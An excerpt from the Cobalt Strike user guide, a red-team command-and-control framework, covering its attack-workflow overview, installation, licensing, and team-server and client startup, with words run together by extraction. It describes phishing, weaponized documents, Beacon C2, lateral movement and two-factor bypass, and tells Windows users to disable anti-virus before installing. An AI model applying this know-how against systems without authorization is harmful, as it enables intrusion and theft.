13081 lines
484 KiB
Markdown
13081 lines
484 KiB
Markdown
# cobalt cobalt-strike userguide
|
||
|
||
|
||
---
|
||
|
||
Cobalt Strike
|
||
User Guide
|
||
|
||
CopyrightTermsandConditions
|
||
Copyright©Fortra,LLCanditsgroupofcompanies.Alltrademarksandregisteredtrademarksarethepropertyoftheirrespective
|
||
owners.
|
||
ThecontentinthisdocumentisprotectedbytheCopyrightLawsoftheUnitedStatesofAmericaandothercountriesworldwide.The
|
||
unauthorizeduseand/orduplicationofthismaterialwithoutexpressandwrittenpermissionfromFortraisstrictlyprohibited.Excerpts
|
||
andlinksmaybeused,providedthatfullandclearcreditisgiventoFortrawithappropriateandspecificdirectiontotheoriginalcontent.
|
||
202310100841-4.9.1
|
||
|
||
Table of Contents
|
||
Welcome to Cobalt Strike 10
|
||
Overview 10
|
||
InstallationandUpdates 11
|
||
StartingtheTeamServer 20
|
||
StartingaCobaltStrikeClient 21
|
||
DistributedandTeamOperations 23
|
||
ScriptingCobaltStrike 24
|
||
RunningtheClientonMacOSX 26
|
||
User Interface 28
|
||
Overview 28
|
||
Toolbar 28
|
||
SessionandTargetVisualizations 29
|
||
Tabs 32
|
||
Consoles 32
|
||
Tables 33
|
||
KeyboardShortcuts 34
|
||
Data Management 36
|
||
Overview 36
|
||
Targets 36
|
||
Services 37
|
||
Credentials 37
|
||
CobaltStrikeUserGuide www.fortra.com page:iii
|
||
|
||
TableofContents
|
||
Maintenance 38
|
||
Listener and Infrastructure Management 39
|
||
Overview 39
|
||
ListenerManagement 39
|
||
CobaltStrike’sBeaconPayload 41
|
||
PayloadStaging 43
|
||
DNSBeacon 44
|
||
HTTPBeaconandHTTPSBeacon 50
|
||
SMBBeacon 56
|
||
TCPBeacon 59
|
||
ExternalC2 62
|
||
ForeignListeners 64
|
||
InfrastructureConsolidation 65
|
||
Initial Access 67
|
||
Client-sideSystemProfiler 67
|
||
ApplicationBrowser 67
|
||
CobaltStrikeWebServices 68
|
||
User-drivenAttackPackages 68
|
||
HostingFiles 79
|
||
User-drivenWebDrive-byAttacks 79
|
||
Client-sideExploits 83
|
||
CloneaSite 84
|
||
SpearPhishing 85
|
||
CobaltStrikeUserGuide www.fortra.com page:iv
|
||
|
||
TableofContents
|
||
Payload Artifacts and Anti-virus Evasion 89
|
||
TheArtifactKit 89
|
||
TheVeilEvasionFramework 91
|
||
JavaAppletAttacks 91
|
||
TheResourceKit 92
|
||
TheSleepMaskKit 92
|
||
Post Exploitation 93
|
||
BeaconCovertC2Payload 93
|
||
TheBeaconConsole 93
|
||
TheBeaconMenu 94
|
||
AsynchronousandInteractiveOperations 94
|
||
RunningCommands 95
|
||
SessionPassing 96
|
||
AlternateParentProcesses 97
|
||
SpoofProcessArguments 97
|
||
BlockingDLLsinChildProcesses 97
|
||
UploadandDownloadFiles 98
|
||
FileBrowser 98
|
||
TheWindowsRegistry 99
|
||
KeystrokesandScreenshots 100
|
||
ControllingBeaconJobs 100
|
||
TheProcessBrowser 101
|
||
DesktopControl 102
|
||
CobaltStrikeUserGuide www.fortra.com page:v
|
||
|
||
TableofContents
|
||
PrivilegeEscalation 103
|
||
Mimikatz 107
|
||
CredentialandHashHarvesting 107
|
||
PortScanning 108
|
||
NetworkandHostEnumeration 108
|
||
TrustRelationships 109
|
||
LateralMovement 111
|
||
LateralMovementGUI 112
|
||
BeaconDataStore 113
|
||
OtherCommands 114
|
||
Browser Pivoting 115
|
||
Overview 115
|
||
Setup 116
|
||
Use 117
|
||
HowBrowserPivotingWorks 118
|
||
Pivoting 119
|
||
WhatisPivoting 119
|
||
SOCKSProxy 119
|
||
ReversePortForward 120
|
||
SpawnandTunnel 121
|
||
PivotListeners 122
|
||
CovertVPN 123
|
||
SSH Sessions 126
|
||
CobaltStrikeUserGuide www.fortra.com page:vi
|
||
|
||
TableofContents
|
||
TheSSHClient 126
|
||
RunningCommands 126
|
||
UploadandDownloadFiles 127
|
||
Peer-to-peerC2 127
|
||
SOCKSPivotingandReversePortForwards 128
|
||
Malleable Command and Control 129
|
||
Overview 129
|
||
CheckingforErrors 129
|
||
ProfileLanguage 130
|
||
HTTPStaging 138
|
||
ABeaconHTTPTransactionWalk-through 139
|
||
HTTPHostProfiles 140
|
||
HTTPServerConfiguration 143
|
||
Self-signedSSLCertificateswithSSLBeacon 144
|
||
ValidSSLCertificateswithSSLBeacon 145
|
||
ProfileVariants 146
|
||
HTTPBeacons 146
|
||
CodeSigningCertificate 147
|
||
DNSBeacons 148
|
||
ExercisingCautionwithMalleableC2 150
|
||
Malleable PE, Process Injection, and Post Exploitation 151
|
||
Overview 151
|
||
PEandMemoryIndicators 151
|
||
CobaltStrikeUserGuide www.fortra.com page:vii
|
||
|
||
TableofContents
|
||
ProcessInjection 155
|
||
ControllingProcessInjection 157
|
||
ControllingPostExploitation 160
|
||
Post-exUserDefinedReflectiveDLLLoader 163
|
||
UserDefinedReflectiveDLL Loader 164
|
||
Beacon Object Files 171
|
||
WhataretheadvantagesofBOFs? 171
|
||
HowdoBOFswork? 171
|
||
WhatarethedisadvantagesofBOFs? 171
|
||
HowdoIdevelopaBOF? 172
|
||
DynamicFunctionResolution 173
|
||
AggressorScriptandBOFs 174
|
||
BOFCAPI 175
|
||
FormattingBOFOutput 180
|
||
Aggressor Script 186
|
||
WhatisAggressorScript? 186
|
||
HowtoLoadScripts 186
|
||
TheScriptConsole 187
|
||
HeadlessCobaltStrike 188
|
||
AQuickSleepIntroduction 188
|
||
InteractingwiththeUser 190
|
||
CobaltStrike 191
|
||
DataModel 195
|
||
CobaltStrikeUserGuide www.fortra.com page:viii
|
||
|
||
TableofContents
|
||
Listeners 196
|
||
Beacon 199
|
||
SSHSessions 208
|
||
OtherTopics 210
|
||
Callbacks 213
|
||
CustomReports 216
|
||
CompatibilityGuide 218
|
||
Hooks 220
|
||
Events 239
|
||
Functions 255
|
||
PopupHooks 445
|
||
Report-OnlyFunctions 446
|
||
Reporting and Logging 458
|
||
Logging 458
|
||
Reports 458
|
||
CustomLogoinReports 463
|
||
CustomReports 464
|
||
Appendix 466
|
||
KeyboardShortcuts 466
|
||
BeaconCommandBehaviorandOPSECConsiderations 467
|
||
UnicodeSupport 473
|
||
CobaltStrikeUserGuide www.fortra.com page:ix
|
||
|
||
WelcometoCobaltStrike/Overview
|
||
Welcome to Cobalt Strike
|
||
CobaltStrikeisaplatformforadversarysimulationsandredteamoperations.Theproductis
|
||
designedtoexecutetargetedattacksandemulatethepost-exploitationactionsofadvanced
|
||
threatactors.ThissectiondescribestheattackprocesssupportedbyCobaltStrike’sfeatureset.
|
||
Therestofthismanualdiscussesthesefeaturesindetail.
|
||
Overview
|
||
figure1-TheOffenseProblemSet
|
||
Athought-outtargetedattackbeginswithreconnaissance.CobaltStrike’ssystemprofilerisa
|
||
webapplicationthatmapsyourtarget’sclient-sideattacksurface.Theinsightsgleanedfrom
|
||
reconnaissancewillhelpyouunderstandwhichoptionshavethebestchanceofsuccesson
|
||
yourtarget.
|
||
Weaponizationispairingapost-exploitationpayloadwithadocumentorexploitthatwill
|
||
executeitontarget.CobaltStrikehasoptionstoturncommondocumentsintoweaponized
|
||
artifacts.CobaltStrikealsohasoptionstoexportitspost-exploitationpayload,Beacon,ina
|
||
varietyofformatsforpairingwithartifactsoutsideofthistoolset.
|
||
UseCobaltStrike’sspearphishingtooltodeliveryourweaponizeddocumenttooneormore
|
||
peopleinyourtarget’snetwork.CobaltStrike’sphishingtoolrepurposessavedemailsintopixel-
|
||
perfectphishes.
|
||
CobaltStrikeUserGuide www.fortra.com page:10
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
Controlyourtarget’snetworkwithCobaltStrike’sBeacon.Thispost-exploitationpayloaduses
|
||
anasynchronous“low and slow”communicationpatternthat’scommonwithadvancedthreat
|
||
malware.BeaconwillphonehomeoverDNS,HTTP,orHTTPS.Beaconwalksthroughcommon
|
||
proxyconfigurationsandcallshometomultiplehoststoresistblocking.
|
||
Exerciseyourtarget’sattackattributionandanalysiscapabilitywithBeacon’sMalleable
|
||
CommandandControllanguage.ReprogramBeacontouse network indicators that look like
|
||
known malwareorblendinwithexistingtraffic.
|
||
Pivotintothecompromisednetwork,discoverhosts,andmove laterallywithBeacon’shelpful
|
||
automationandpeer-to-peercommunicationovernamedpipesandTCPsockets.CobaltStrike
|
||
isoptimizedtocapturetrustrelationshipsandenablelateralmovementwithcaptured
|
||
credentials,passwordhashes,accesstokens,andKerberostickets.
|
||
DemonstratemeaningfulbusinessriskwithCobaltStrike’suser-exploitationtools.Cobalt
|
||
Strike’sworkflowsmakeiteasytodeploykeystrokeloggersandscreenshotcapturetoolson
|
||
compromisedsystems.Usebrowserpivotingtogainaccesstowebsitesthatyour
|
||
compromisedtargetisloggedontowithInternetExplorer.ThisCobaltStrike-onlytechnique
|
||
workswithmostsitesandbypassestwo-factorauthentication.
|
||
CobaltStrike’sreportingfeaturesreconstruct the engagementforyourclient.Providethe
|
||
networkadministratorsanactivitytimelinesotheymayfindattackindicatorsintheirsensors.
|
||
CobaltStrikegenerateshighqualityreportsthatyoumaypresenttoyourclientsasstand-alone
|
||
productsoruseasappendicestoyourwrittennarrative.
|
||
Throughouteachoftheabovesteps,youwillneedtounderstandthetargetenvironment,its
|
||
defenses,andreasonaboutthebestwaytomeetyourobjectiveswithwhatisavailabletoyou.
|
||
Thisisevasion.ItisnotCobaltStrike’sgoaltoprovideevasionout-of-the-box.Instead,the
|
||
productprovidesflexibility,bothinitspotentialconfigurationsandoptionstoexecuteoffense
|
||
actions,toallowyoutoadapttheproducttoyourcircumstanceandobjectives.
|
||
Installation and Updates
|
||
FortraLLCdistributesCobaltStrikepackagesasnativearchivesforWindows,Linux,and
|
||
MacOSX.
|
||
CobaltStrikeusesaclient/servermodelwhereeachcomponentcanbeinstalledonthesame
|
||
system,butisoftendeployedseparately.TheCobaltStrikeGUIisreferredtoas‘CobaltStrike’,
|
||
the‘CobaltStrikeGUI’,orthecommandusedtostarttheclient‘cobaltstrike’.TheCobaltStrike
|
||
serverisreferredtoas‘TeamServer’orthecommandusedtostarttheserver‘teamserver’.
|
||
ThebasicprocesstoinstallCobaltStrikeinvolvesdownloadingandextractingadistribution
|
||
packageontoyouroperatingsystemandrunninganupdateprocesstodownloadtheproduct.
|
||
CobaltStrikeUserGuide www.fortra.com page:11
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
Before You Begin
|
||
ReadthissectionbeforeyouinstallCobaltStrike.
|
||
System Requirements
|
||
ThefollowingitemsarerequiredforanysystemhostingtheCobaltStrikeclientand/orserver
|
||
components.
|
||
Java
|
||
CobaltStrike'sGUIclientandteamserverrequireoneofthefollowingJavaenvironments:
|
||
l OracleJava1.8
|
||
l OracleJava11
|
||
l OpenJDK11.(seeInstalling OpenJDK on page 13forinstructions)
|
||
NOTE:
|
||
IfyourorganizationdoesnothavealicensethatallowscommercialuseofOracle'sJava,
|
||
weencourageyoutouseOpenJDK11.
|
||
SupportedOperatingSystems
|
||
CobaltStrikeTeamServerissupportedonaLinuxsystemthatmeetstheJavarequirements
|
||
andhasbeentestedonthefollowingDebianbasedLinuxdistributions(otherversionsmaywork
|
||
buthavenotbeentested):
|
||
l Debian
|
||
l Ubuntu
|
||
l KaliLinux
|
||
CobaltStrikeClientrunsonthefollowingsystems:
|
||
l Windows7andabove
|
||
l MacOSX10.13andabove
|
||
l GUIbasedLinux,suchas:Debian,UbuntuandKaliLinux(otherversionsmayworkbut
|
||
havenotbeentested)
|
||
Hardware
|
||
CobaltStrikeUserGuide www.fortra.com page:12
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
Inadditiontoanacceptedoperatingsystem,thebelowminimumrequirementsshouldbemet:
|
||
l 2GHz+processor
|
||
l 2GBRAM
|
||
l 500MB+availablediskspace
|
||
OnAmazon'sEC2,useatleastaHigh-CPUMedium(c1.medium,1.7GB)instance.
|
||
Linuxglibc
|
||
BeawarethatcertainLinuxdistributionsmaybemissingordon'thavethecorrectversionof
|
||
glibc.Ifyourunintothatissue,reviewtheKnowledgeArticle,glibcMissingFromOlderLinux
|
||
Distributions,ontheFortraPortal.
|
||
Installing OpenJDK
|
||
CobaltStrikeistestedwithOpenJDK11anditslaunchersarecompatiblewithaproperly
|
||
installedOpenJDK11environment.
|
||
Linux(Kali2018.4,Ubuntu18.04)
|
||
1. UpdateAPT:
|
||
sudo apt-get update
|
||
2. InstallOpenJDK11withAPT:
|
||
sudo apt-get install openjdk-11-jdk
|
||
3. MakeOpenJDK11thedefault:
|
||
sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
|
||
Linux(Other)
|
||
1. UninstallthecurrentOpenJDKpackage(s).
|
||
2. DownloadOpenJDKforLinux/x64at:https://jdk.java.net/archive/.
|
||
3. ExtracttheOpenJDKbinary:
|
||
tar zxvf openjdk-11.0.1_linux-x64_bin.tar.gz
|
||
4. MovetheOpenJDKfolderto/usr/local:
|
||
mv jdk-11.0.1 /usr/local
|
||
5. Addthefollowingto~/.bashrc:
|
||
JAVA_HOME="/usr/local/jdk-11.0.1"
|
||
CobaltStrikeUserGuide www.fortra.com page:13
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
PATH=$PATH:$JAVA_HOME/bin
|
||
6. Refreshyour~/.bashrc tomakethenewenvironmentvariablestakeeffect:
|
||
source ~/.bashrc
|
||
MacOSX
|
||
1. DownloadOpenJDKformacOS/x64at:https://jdk.java.net/archive/.
|
||
2. OpenaTerminalandnavigatetotheDownloads/ folder.
|
||
3. Extractthearchive:
|
||
tar zxvf openjdk-11.0.1_osx-x64_bin.tar.gz
|
||
4. Movetheextractedarchiveto/Library/Java/JavaVirtualMachines/:
|
||
sudo mv jdk-11.0.1.jdk/ /Library/Java/JavaVirtualMachines/
|
||
ThejavacommandonMacOSXwillusethehighestJavaversionin/Library/Javaasthe
|
||
default.
|
||
TIP:
|
||
IfyouareseeingaJRELoadError messagethisisbecausetheJavaAppLauncherstub
|
||
includedwithCobaltStrikeloadsalibraryfromasetpathtoruntheJVMwithinthestub
|
||
process.Issuethefollowingcommandtofixthiserror:
|
||
sudo ln -fs /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk
|
||
/Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin
|
||
Replacejdk-11.0.2.jdkwithyourJavapath.ThenextCobaltStrikereleasewilluseaJava
|
||
ApplicationStubforMacOSXthatismoreflexible.
|
||
Windows
|
||
1. DownloadOpenJDKforWindows/x64at:https://jdk.java.net/archive/.
|
||
2. Extractthearchivetoc:\program files\jdk-11.0.1.
|
||
3. Addc:\program files\jdk-11.0.\bin toyouruser'sPATHenvironmentvariable:
|
||
a. GotoControl Panel-> System-> Change Settings-> Advanced-> Environment
|
||
Variables....
|
||
b. HighlightPathinUser variables for user.
|
||
c. PressEdit.
|
||
d. PressNew.
|
||
e. Type:c:\program files\jdk-11.0.1\bin.
|
||
f. PressOKonalldialogs.
|
||
Wayland Desktop - Not Supported
|
||
CobaltStrikeUserGuide www.fortra.com page:14
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
WaylandisamodernreplacementfortheXWindowsSystem.Waylandhasmadegreatstrides,
|
||
asaproject,andsomedesktopenvironmentsuseitastheirdefaultwindowsystem.Don'tlet
|
||
theadoptionfoolyouthough.Notallapplicationsorapplicationenvironmentswork100%
|
||
perfectlyonWayland.Therearestillbugsandissuestoaddress.
|
||
TherearebugsinJava(orWayland)thatmaycauseagraphicalJavaapplicationtocrash,
|
||
duringnormaluse,whenruninaWaylanddesktop.ThesebugsaffectCobaltStrikeusers.
|
||
Fortra does not support the use of Cobalt Strike on Wayland desktops.
|
||
Am IusingWayland?
|
||
Typeecho $XDG_SESSION_TYPEtofindoutifyou'reonwaylandorx11.
|
||
HowtodisableWaylandonKaliLinux
|
||
ThelatestversionofKaliLinux2017RollingusesaWaylanddesktopbydefault.Tochangethis
|
||
backtoX11:
|
||
1. Open/etc/gdm3/daemon.confwithyourfavoritetexteditor.
|
||
2. Findthe[daemon]section.
|
||
3. AddWaylandEnable=falseandrebootyoursystem.
|
||
Installing Cobalt Strike
|
||
FollowtheseinstructionstoinstallCobaltStrike.
|
||
NOTE:
|
||
TheCobaltStrikeDistribution Package(steps1and3)containstheOS-specificCobalt
|
||
Strikelauncher(s),supportingfiles,andtheupdaterprogram.ItdoesnotcontaintheCobalt
|
||
Strikeprogramitself.RunningtheUpdate Program(step4)downloadstheCobaltStrike
|
||
productandperformsthefinalinstallationsteps.
|
||
1. DownloadaCobaltStrikedistributionpackageforasupportedoperatingsystem.(an
|
||
emailisprovidedwithalinktothedownload)
|
||
2. SetuparecommendedJavaenvironment.(seeInstalling OpenJDK on page 13for
|
||
instructions)
|
||
CobaltStrikeUserGuide www.fortra.com page:15
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
3. Extract,mountorunzipthedistributionpackage.Basedontheoperatingsystem
|
||
perform oneofthefollowing.
|
||
a. ForLinux:
|
||
i. Extractthecobaltstrike-dist.tgz:
|
||
tar zxvf cobaltstrike-dist.tgz
|
||
b. ForMacOSX:
|
||
i. Double-clickthecobaltstrike-dist.dmg filetomountit.
|
||
ii. DragtheCobalt StrikefoldertotheApplicationsfolder.
|
||
c. ForWindows:
|
||
i. Disableanti-virusbeforeyouinstallCobaltStrike.
|
||
ii. Useyourpreferredziptooltoextractthecobaltstike.zip filetoaninstall
|
||
location.
|
||
4. Runtheupdateprogram tofinishtheinstall.Basedontheoperatingsystem perform
|
||
oneofthefollowing.
|
||
a. ForLinux:
|
||
i. Enterthefollowingcommands:
|
||
cd /path/to/cobaltstrike
|
||
./update
|
||
b. ForMacOSX:
|
||
i. NavigatetotheCobalt Strikefolder.
|
||
ii. Double-clickUpdate Cobalt Strike.command.
|
||
c. ForWindows:
|
||
i. NavigatetotheCobalt Strikefolder.
|
||
ii. Double-clickupdate.bat.
|
||
Makesureyouupdatebothyourteamserverandclientsoftwarewithyourlicensekey.Cobalt
|
||
Strikeisgenerallylicensedonaperuserbasis.Theteamserverdoesnotrequireaseparate
|
||
license.
|
||
License Authorization Files
|
||
ThelicensedversionofCobaltStrikerequiresavalidauthorizationfiletostart.Anauthorization
|
||
fileisanencryptedblobthatprovidesinformationaboutyourlicensetotheCobaltStrike
|
||
product.
|
||
CobaltStrikeUserGuide www.fortra.com page:16
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
Authorizationfilesarenowassociatedtoaspecificrelease.Authorizationfilesfor4.8andearlier
|
||
willcontinuetobebackwardcompatible.Authorizationfilesfor4.9andlaterwillonlybevalidfor
|
||
thespecificversion.
|
||
How doI get an authorization file?
|
||
Thebuilt-inupdateprogramrequestsanauthorizationfilefromCobaltStrike'supdateserver
|
||
whenit'srun.Theupdateprogramdownloadsanewauthorizationfileforthecurrentreleased
|
||
version,evenifyourCobaltStrikeversionisuptodate.Thisallowstheauthorizationfiletostay
|
||
currentwiththelicensedatesinFortrarecords.
|
||
InordertogetanauthorizationfileforapreviousversionusetheCobaltStrikeAuthFile
|
||
Generatorsite.Thissitewillgenerateanauthorizationfilefortheversionandlicensekeyyou
|
||
enteronthepage.Usethedownloadlinktoretrievetheauthorizationfileorusetheinstructions
|
||
onthepagetoconvertthebase64encodedstringtoanauthorizationfile.Thencopythe
|
||
authorizationfiletoyourCobaltStrikeinstallationdirectory.
|
||
What happenswhen my licenseexpires?
|
||
CobaltStrikewillrefusetostartwhenitsauthorizationfileexpires.Additionally,thelicensed
|
||
CobaltStrikeproductchecksauthorizationfilesdaily.Iftheauthorizationfileexpireswhile
|
||
CobaltStrikeisrunning,theteamserverkeepsrunningforanadditional14daysgraceperiod.
|
||
Theteamserverwillshutdowniftheauthorizationfileisnotreplacedduringthatperiod.
|
||
Details:
|
||
l Teamserverchecksthelicenseatstartupandat10AMeveryday.
|
||
l Theteamserverlicenseexpirationisloggedintheeventlogwhentheteam serverstarts.
|
||
l Clientsconnectedtoateamserverwilldisplayalicensewarningribbonstarting45days
|
||
priortolicenseexpiration.
|
||
l Runningteamserverswillhavea14daygraceperiodbeforetheserverisshutdown
|
||
duringthedailylicensecheck.
|
||
l Ifyouneedtoextendthelicenseforarunningteamserver,youcaninstall/update
|
||
CobaltStrikeinadifferentlocationandcopy/replacethe“cobaltstrike.auth”filefrom the
|
||
newinstallintotherunninginstance.Iftheteamserverversionispriortothecurrent
|
||
releasedversionthenusetheCobaltStrikeAuthFileGeneratorsiteinstead.
|
||
When doesmy authorization fileexpire?
|
||
YourauthorizationfileexpireswhenyourCobaltStrikelicenseexpires.IfyourenewyourCobalt
|
||
Strikelicense,runthebuilt-inupdateprogramtorefreshtheauthorizationfileforthecurrent
|
||
CobaltStrikeUserGuide www.fortra.com page:17
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
releasedversionwiththelatestinformation.ForpreviousversionsusetheCobaltStrikeAuth
|
||
FileGeneratorsitetorefreshtheauthorizationfilewiththelatestinformation.
|
||
GotoHelp->System Informationtofindoutwhenyourauthorizationfileexpires.Lookforthe
|
||
"validto"valueundertheOthersection.Remember,theClientInformationandTeamServer
|
||
Informationmayhavedifferentvalues(dependingonwhichlicensekeywasusedandwhenthe
|
||
authorizationfilewaslastrefreshed).
|
||
CobaltStrikewillalsowarnyouwhenitsauthorizationfileiswithin45daysofitsvalidtodate.
|
||
How doI bring an authorization fileintoa closed environment?
|
||
Theauthorizationfileiscobaltstrike.auth.Theupdateprogramalwaysco-locatesthisfilewith
|
||
cobaltstrike.jar.TouseCobaltStrikeinaclosedenvironment:
|
||
1. DownloadtheCobaltStrikepackageathttps://www.cobaltstrike.com/download
|
||
2. UpdatetheCobaltStrikepackagefrom aninternetconnectedsystem
|
||
3. Copythecontentsoftheupdatedcobaltstrike/folderintoyourenvironment.Themost
|
||
importantfilesarecobaltstrike.jarandcobaltstrike.auth.
|
||
DoesCobalt StrikephonehometoFortra?
|
||
Beyondtheupdateprocess,CobaltStrikedoesnot"phonehome"toFortra.Theauthorization
|
||
fileisgeneratedbytheupdateprocess.
|
||
How doI usean older version ofCobalt Strikewith a refreshed authorization
|
||
file?
|
||
InordertogetanauthorizationfileforapreviousversionusetheCobaltStrikeAuthFile
|
||
Generatorsite.Thissitewillgenerateanauthorizationfilefortheversionandlicensekeyyou
|
||
enteronthepage.Usethedownloadlinktoretrievetheauthorizationfileorusetheinstructions
|
||
onthepagetoconvertthebase64encodedstringtoanauthorizationfile.Thencopythe
|
||
authorizationfiletoyourCobaltStrikeinstallationdirectory.
|
||
WhatistheCustomerIDvalue?
|
||
TheCustomerIDisa4-bytenumberassociatedwithaCobaltStrikelicensekey.CobaltStrike
|
||
3.9andlaterembedthisinformationintothepayloadstagersandstagesgeneratedbyCobalt
|
||
Strike.
|
||
How doI find theCustomer ID valuein a Cobalt Strikeartifact?
|
||
CobaltStrikeUserGuide www.fortra.com page:18
|
||
|
||
WelcometoCobaltStrike/InstallationandUpdates
|
||
TheCustomerIDvalueisthelast4-bytesofaCobaltStrikepayloadstagerinCobaltStrike3.9
|
||
andlater.
|
||
ThisscreenshotistheHTTPstagerfromthetrial.ThetrialhasaCustomerIDvalueof0.The
|
||
last4-bytesofthisstager(0x0,0x0,0x0,0x0)reflectthis.
|
||
figure2-HTTPPayloadStager(CobaltStrikeTrial)
|
||
TheCustomerIDvaluealsoexistsinthepayloadstage,butit'smorestepstorecover.Cobalt
|
||
StrikedoesnotusetheCustomerIDvalueinitsnetworktrafficorotherpartsofthetool.
|
||
How doI protect disparatered team infrastructurefrom cross-identification
|
||
with thisID?
|
||
Ifyouhaveauniqueauthorizationfileoneachteamserver,theneachteamserverandthe
|
||
artifactsthatoriginatefromitwillhaveadifferentID.
|
||
CobaltStrike'supdateservergeneratesanewauthorizationfileeachtimetheupdateprogram
|
||
isrun.EachauthorizationfilehasauniqueID.CobaltStrikeonlypropagatestheteamserver's
|
||
ID.ItdoesnotpropagatetheIDfromtheGUIorheadlessclient'sauthorizationfile.
|
||
After You are Done
|
||
Congratulations!CobaltStrikeisnowinstalled.Readthefollowingforadditionalinformationand
|
||
yournextsteps.
|
||
Next Steps
|
||
Starting the Team Server on page 20
|
||
Starting a Cobalt Strike Client on page 21
|
||
CobaltStrikeUserGuide www.fortra.com page:19
|
||
|
||
WelcometoCobaltStrike/StartingtheTeamServer
|
||
Starting the Team Server
|
||
CobaltStrikeissplitintoclientandaservercomponents.Theserver,referredtoastheteam
|
||
server,isthecontrollerfortheBeaconpayloadandthehostforCobaltStrike’ssocial
|
||
engineeringfeatures.TheteamserveralsostoresdatacollectedbyCobaltStrikeandit
|
||
manageslogging.
|
||
TheCobaltStriketeamservermustrunonasupportedLinuxsystem.TostartaCobaltStrike
|
||
teamserver,issuethefollowingcommandtoruntheteamserverscriptincludedwiththe
|
||
CobaltStrikeLinuxpackage:
|
||
figure3-StartingtheTeamServer
|
||
./teamserver <ip_address> <password> [<malleableC2profile> <kill_
|
||
date>]
|
||
Theteamserverscriptusesthefollowingtwomandatoryandtwooptionalparameters:
|
||
IP Address-(mandatory)EntertheexternallyreachableIPaddressoftheteamserver.Cobalt
|
||
Strikeusesthisvalueasadefaulthostforitsfeatures.
|
||
Password-(mandatory)Enterapasswordthatyourteammemberswillusetoconnectthe
|
||
CobaltStrikeclienttotheteamserver.
|
||
Malleable C2 Profile-(optional)SpecifyavalidMalleableC2Profile.SeeMalleable Command
|
||
and Control on page 129formoreinformationonthisfeature.
|
||
Kill Date-(optional)EnteradatevalueinYYYY-MM-DDformat.Theteamserverwillembedthis
|
||
killdateintoeachBeaconstageitgenerates.TheBeaconpayloadwillrefusetorunonor
|
||
afterthisdateandwillalsoexitifitwakesuponorafterthisdate.
|
||
Whentheteamserverstarts,itwillpublishtheSHA256hashoftheteamserver’sSSL
|
||
certificate.Distributethishashtoyourteammembers.Whenyourteammembersconnect,
|
||
theirCobaltStrikeclientwillaskiftheyrecognizethishashbeforeitauthenticatestotheteam
|
||
server.Thisisanimportantprotectionagainstman-in-the-middleattacks.
|
||
Team Server Properties File
|
||
CobaltStrikeUserGuide www.fortra.com page:20
|
||
|
||
WelcometoCobaltStrike/StartingaCobaltStrikeClient
|
||
TeamServer.propisanoptionalfilecontaininganumberofparametersthatcanbeusedto
|
||
customizesettings.Thisfileisnotincludedinthedistributionasthedefaultsarethe
|
||
recommendedsettings.Ifthereisaneedtomodifythesettings,downloadthedefault
|
||
TeamServer.propfilefromhttps://github.com/Cobalt-Strike/teamserver-proprepositoryinto
|
||
theCobaltStrikeinstallationdirectory.Makeanymodificationsandrestarttheteamserver.
|
||
ForadditionalinformationonasettingseetheREADME.mdintherepositoryandcommentsin
|
||
theTeamServer.propfile.
|
||
Starting a Cobalt Strike Client
|
||
FollowthestepsbelowtoconnecttheCobaltStrikeclienttotheteamserver.
|
||
Steps
|
||
1. TostarttheCobaltStrikeclient,usethelauncherincludedwithyourplatform’spackage.
|
||
a. ForLinux:
|
||
i. Enterthefollowingcommands:
|
||
./cobaltstrike
|
||
b. ForMacOSX:
|
||
i. NavigatetotheCobalt Strikefolder.
|
||
ii. Double-clickcobaltstrike.
|
||
c. ForWindows:
|
||
i. NavigatetotheCobalt Strikefolder.
|
||
ii. Double-clickcobaltstrike.exe.
|
||
TheConnectDialogscreendisplays.
|
||
CobaltStrikeUserGuide www.fortra.com page:21
|
||
|
||
WelcometoCobaltStrike/StartingaCobaltStrikeClient
|
||
figure 4 - CobaltStrikeConnectDialog
|
||
2. CobaltStrikekeepstrackoftheteam serversyouconnecttoandremembersyour
|
||
information.Selectoneoftheseteam serverprofilesfrom theleft-hand-sideofthe
|
||
connectdialogtopopulatetheconnectdialogwithitsinformation.UsetheAlias Names
|
||
andHost Namesbuttonstotogglehowthelistofhostsaredisplayed.Active
|
||
connectionswillbedisplayedinbluetext.Youmaycontrolhowthehostlistisinitially
|
||
displayed,activeconnectiontextcolor,andprunethelistthroughCobalt Strike ->
|
||
Preferences ->Team Servers.
|
||
Parameters:
|
||
Alias- Enteranaliasforthehostorusethedefault.Thealiasnamecannotbeempty,
|
||
startwithan'*',orusethesamealiasnameofanactiveconnection.
|
||
Host- Specifyyourteam server’saddressintheHostfield.Thehostnamecannotbe
|
||
empty.
|
||
Port- DisplaysthedefaultPortfortheteam server(50050).Thisisrarelychange.The
|
||
portcannotbeemptyandmustbeanumericnumber.
|
||
User- TheUserfieldisyournicknameontheteam server.Changethistoyourcallsign,
|
||
handle,ormade-uphackerfantasyname.Theusernamecannotbeempty.
|
||
Password- Enterthesharedpasswordfortheteam server.
|
||
3. PressConnecttoconnecttotheCobaltStriketeam server.
|
||
Ifthisisyourfirstconnectiontothisteam server,CobaltStrikewillaskifyourecognize
|
||
theSHA256hashofthisteam server.
|
||
figure 5 - Verifyingtheserver’sSSLcertificate
|
||
4. Ifyoudo,pressYes,andtheCobaltStrikeclientwillconnecttotheserverandopenthe
|
||
clientuserinterface.
|
||
CobaltStrikeUserGuide www.fortra.com page:22
|
||
|
||
WelcometoCobaltStrike/DistributedandTeamOperations
|
||
NOTE:
|
||
CobaltStrikewillalsorememberthisSHA256hashforfutureconnections.Youmay
|
||
managethesehashesthroughCobalt Strike -> Preferences -> Fingerprints.
|
||
Distributed and Team Operations
|
||
UseCobaltStriketocoordinateadistributedredteameffort.StageCobaltStrikeononeormore
|
||
remotehosts.Startyourteamserversandhaveyourteamconnect.
|
||
figure6-DistributedOperationswithCobaltStrike
|
||
Onceconnectedtoateamserver,yourteamwill:
|
||
l Usethesamesessions
|
||
l Sharehosts,captureddata,anddownloadedfiles
|
||
l Communicatethroughasharedeventlog.
|
||
